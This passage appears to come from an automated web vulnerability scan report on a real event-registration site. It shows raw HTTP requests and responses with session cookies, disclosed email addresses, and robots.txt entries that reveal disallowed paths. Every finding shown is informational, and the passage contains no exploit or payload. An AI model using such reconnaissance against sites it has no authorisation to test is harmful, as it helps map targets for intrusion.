Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: *
Vary: Accept-Encoding
Cache-Control: public, max-age=30
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:29:46 GMT
Expires: Tue, 19 Apr 2011 19:30:16 GMT
Set-Cookie: ASP.NET_SessionId=fy1kfqnhxwqzza55petnrcav; path=/; HttpOnly
Set-Cookie: CurrentROLSession=; expires=Tue, 19-Apr-2011 19:29:46 GMT; path=/
Set-Cookie: %5FrolStats%5FID=C64AEB38-5DF4-42EE-9917-DD466782C6D9; path=/
Last-Modified: Tue, 19 Apr 2011 19:29:46 GMT
Content-Length: 24938

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
cription" content="When: Wednesday, April 20, 2011 9:00 AM - Friday, April 22, 2011 2:00 PM (Eastern Time). Where: Seaport Hotel, One Seaport Lane Boston, MA United States. Phone: 617.240.0122
Email: info@sourceconference.com" />
...[SNIP]...
<br>
Email: info@sourceconference.com</span>
...[SNIP]...

6.3. http://www.regonline.com/__articles/products/event~planning~software  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /__articles/products/event~planning~software

Issue detail

The following email address was disclosed in the response:

Request

GET /__articles/products/event~planning~software HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:10 GMT
Expires: -1
Pragma: no-cache
Connection: close
X-Powered-By: ASP.NET
Content-Length: 56739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Event Planning
...[SNIP]...
<a id="ctl00_site_content_header_contactUs" class="contactUs" href="mailto:advisor@regonline.com">
...[SNIP]...
<a id="ctl00_site_content_footer_footerContactUs" href="mailto:advisor@regonline.com">
...[SNIP]...

7. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.regonline.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Date: Tue, 19 Apr 2011 19:29:47 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=v15pp2ucldxiavzvv3gmtq55; path=/; HttpOnly
X-Powered-By: ASP.NET
Content-Length: 191

User-agent: *
Disallow: /__users/
Disallow: /__services/
Sitemap: http://sitemaps.regonline.com/rol-en-US.xml
Sitemap: https://www.regonline.com/documents/sitemaps/www.regonline.com.xml

Report generated by XSS.CX at Tue Apr 19 14:54:47 CDT 2011.